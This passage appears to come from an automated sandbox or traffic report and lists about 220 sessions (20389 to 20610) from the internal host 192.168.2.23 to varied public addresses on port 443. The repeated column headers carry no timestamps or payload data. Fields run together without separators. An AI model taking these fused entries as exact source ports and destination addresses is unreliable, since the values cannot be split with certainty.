                                                20389192.168.2.2356950113.162.105.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20390192.168.2.234688427.200.223.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20391192.168.2.2334218187.181.138.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20392192.168.2.2352320169.113.29.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20393192.168.2.2332966217.54.101.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20394192.168.2.2338970213.52.216.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20395192.168.2.2352570134.25.239.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20396192.168.2.2339530193.21.243.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20397192.168.2.2338140101.76.147.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20398192.168.2.233981893.5.88.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20399192.168.2.2341284218.115.36.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20400192.168.2.2339978207.226.70.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20401192.168.2.2360420166.168.65.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20402192.168.2.2334544192.60.253.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20403192.168.2.2343882213.45.241.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20404192.168.2.2358898152.203.157.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20405192.168.2.2334130194.155.160.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20406192.168.2.2340074193.134.65.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20407192.168.2.2354814192.156.209.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20408192.168.2.2337236109.144.5.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20409192.168.2.2333390128.31.59.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20410192.168.2.235604678.79.102.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20411192.168.2.2359458216.167.236.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20412192.168.2.23408288.45.220.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20413192.168.2.2340186145.181.212.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20414192.168.2.233425897.255.16.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20415192.168.2.235187452.217.194.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20416192.168.2.233540240.222.13.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20417192.168.2.2337924221.68.244.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20418192.168.2.2346044216.57.110.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20419192.168.2.2359096116.162.120.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20420192.168.2.2356322209.111.160.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20421192.168.2.2332876157.4.161.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20422192.168.2.2357538216.66.237.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20423192.168.2.2344972140.99.193.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20424192.168.2.2356384159.112.194.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20425192.168.2.235200418.177.70.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20426192.168.2.234676252.140.33.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20427192.168.2.2351606113.91.143.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20428192.168.2.23363904.200.243.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20429192.168.2.2344530147.148.31.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20430192.168.2.233544040.105.139.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20431192.168.2.2341962116.217.15.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20432192.168.2.2359334185.50.61.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20433192.168.2.233600661.43.95.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20434192.168.2.233327668.97.249.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20435192.168.2.234388220.3.195.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20436192.168.2.2346760159.123.70.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20437192.168.2.2355104192.149.99.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20438192.168.2.2355308146.47.66.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20439192.168.2.2358018107.231.47.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20440192.168.2.235386446.75.8.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20441192.168.2.233336888.73.169.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20442192.168.2.233788837.168.36.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20443192.168.2.2355126144.32.158.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20444192.168.2.233536214.34.171.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20445192.168.2.234629444.25.204.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20446192.168.2.234927071.194.236.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20447192.168.2.235272414.127.7.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20448192.168.2.233984082.177.216.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20449192.168.2.233879863.70.49.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20450192.168.2.2359950183.21.177.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20451192.168.2.2344414216.52.15.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20452192.168.2.2348098213.180.153.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20453192.168.2.2350632150.203.46.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20454192.168.2.234368640.228.219.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20455192.168.2.2337236150.247.197.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20456192.168.2.2335634112.151.41.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20457192.168.2.2334238185.237.91.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20458192.168.2.23330942.181.74.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20459192.168.2.234217251.83.48.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20460192.168.2.234042272.142.233.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20461192.168.2.2342260205.220.238.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20462192.168.2.23450721.245.181.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20463192.168.2.2357814104.240.171.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20464192.168.2.2347828204.32.95.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20465192.168.2.2338930108.1.62.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20466192.168.2.2357908207.92.229.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20467192.168.2.236020085.95.254.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20468192.168.2.2355600168.24.98.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20469192.168.2.2334470187.53.138.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20470192.168.2.2336390120.77.108.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20471192.168.2.233609843.249.98.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20472192.168.2.2356352118.162.83.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20473192.168.2.2334426206.16.83.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20474192.168.2.2353988144.186.161.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20475192.168.2.235117482.47.11.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20476192.168.2.2360392124.153.225.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20477192.168.2.234319262.143.72.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20478192.168.2.2335386167.108.153.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20479192.168.2.2350970201.224.215.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20480192.168.2.2348018151.14.28.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20481192.168.2.2352178135.108.238.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20482192.168.2.2344908221.10.58.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20483192.168.2.2356832131.4.6.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20484192.168.2.2352976223.40.119.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20485192.168.2.2349974208.35.148.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20486192.168.2.233592847.35.180.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20487192.168.2.233836496.51.112.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20488192.168.2.235084882.61.13.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20489192.168.2.2341438174.83.206.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20490192.168.2.2333084144.84.56.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20491192.168.2.233922287.221.168.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20492192.168.2.2345124140.168.90.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20493192.168.2.2337182143.124.150.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20494192.168.2.23463621.113.35.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20495192.168.2.2357416150.213.246.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20496192.168.2.234637834.133.55.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20497192.168.2.2346144124.137.231.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20498192.168.2.2352718197.42.87.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20499192.168.2.2359912193.191.149.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20500192.168.2.2360026143.241.224.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20501192.168.2.2357826175.253.160.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20502192.168.2.2349938128.187.206.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20503192.168.2.2336786115.134.83.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20504192.168.2.2333810137.77.240.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20505192.168.2.234363817.95.151.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20506192.168.2.2332844187.74.80.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20507192.168.2.233894251.104.181.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20508192.168.2.2337666107.140.171.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20509192.168.2.23492801.122.37.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20510192.168.2.2342316114.153.62.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20511192.168.2.2353842196.42.193.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20512192.168.2.233400273.15.46.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20513192.168.2.2357116140.145.153.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20514192.168.2.2342872198.242.229.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20515192.168.2.2347628195.142.173.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20516192.168.2.2352074190.26.153.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20517192.168.2.234784294.46.110.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20518192.168.2.2343058194.37.110.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20519192.168.2.235635668.184.202.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20520192.168.2.2347124103.255.82.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20521192.168.2.235794471.36.96.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20522192.168.2.235356284.121.216.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20523192.168.2.2348502143.214.155.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20524192.168.2.234599254.82.81.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20525192.168.2.2355702158.154.27.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20526192.168.2.2353144115.170.94.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20527192.168.2.234307059.152.55.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20528192.168.2.2358868176.164.65.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20529192.168.2.2350322113.254.168.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20530192.168.2.235674853.104.171.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20531192.168.2.2334992221.234.31.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20532192.168.2.2351194145.21.8.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20533192.168.2.23475728.200.156.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20534192.168.2.2339972193.206.159.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20535192.168.2.2339048103.16.185.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20536192.168.2.235918293.135.36.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20537192.168.2.2336512183.41.79.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20538192.168.2.2344334184.7.222.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20539192.168.2.23559405.149.24.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20540192.168.2.2343728175.77.66.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20541192.168.2.235733248.144.78.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20542192.168.2.235215684.195.72.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20543192.168.2.2349034167.82.237.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20544192.168.2.235180092.129.182.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20545192.168.2.2341224132.205.122.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20546192.168.2.2359792187.160.253.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20547192.168.2.2339108116.111.201.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20548192.168.2.2340502109.170.37.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20549192.168.2.2332814172.129.186.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20550192.168.2.2341944146.150.221.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20551192.168.2.2335752115.149.41.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20552192.168.2.234935679.9.71.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20553192.168.2.234799892.184.66.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20554192.168.2.234594897.241.19.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20555192.168.2.235001667.230.164.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20556192.168.2.235154832.47.243.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20557192.168.2.235709414.42.80.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20558192.168.2.234838287.27.13.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20559192.168.2.2341992184.6.126.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20560192.168.2.2336414179.83.200.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20561192.168.2.2343120145.196.128.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20562192.168.2.2350620111.168.22.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20563192.168.2.2338974163.16.238.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20564192.168.2.235264624.12.51.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20565192.168.2.235124853.50.237.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20566192.168.2.2342074143.148.34.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20567192.168.2.2346980209.208.31.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20568192.168.2.234960423.193.48.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20569192.168.2.2333908180.199.9.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20570192.168.2.235587452.96.149.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20571192.168.2.2350362121.165.51.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20572192.168.2.23562284.9.198.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20573192.168.2.234554035.140.231.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20574192.168.2.2348970174.163.200.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20575192.168.2.23559125.147.100.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20576192.168.2.2343872186.232.120.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20577192.168.2.2344392194.201.246.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20578192.168.2.2339372180.173.52.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20579192.168.2.234957687.153.40.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20580192.168.2.2349202163.176.149.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20581192.168.2.2358884211.168.34.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20582192.168.2.2355490208.182.18.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20583192.168.2.233731672.36.97.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20584192.168.2.235643885.255.225.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20585192.168.2.2340488157.44.199.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20586192.168.2.2357204189.79.220.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20587192.168.2.233531086.103.58.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20588192.168.2.2338420152.111.197.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20589192.168.2.2352650105.46.89.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20590192.168.2.2359746131.44.65.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20591192.168.2.2354284188.252.155.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20592192.168.2.2336088122.245.113.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20593192.168.2.2357490191.12.252.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20594192.168.2.23400908.200.51.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20595192.168.2.234923469.214.206.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20596192.168.2.235579242.191.97.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20597192.168.2.23488261.173.28.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20598192.168.2.236072877.241.84.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20599192.168.2.233928499.174.58.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20600192.168.2.2341504183.48.148.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20601192.168.2.2355372148.52.101.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20602192.168.2.2341302158.214.214.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20603192.168.2.2356468190.47.15.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20604192.168.2.2349712204.245.154.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20605192.168.2.235607825.229.208.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20606192.168.2.2354462163.204.239.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20607192.168.2.2353760112.113.173.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20608192.168.2.234789054.159.157.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20609192.168.2.235506854.199.243.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20610192.168.2.233370078.29.0.131443
                                                TimestampBytes transferredDirectionData


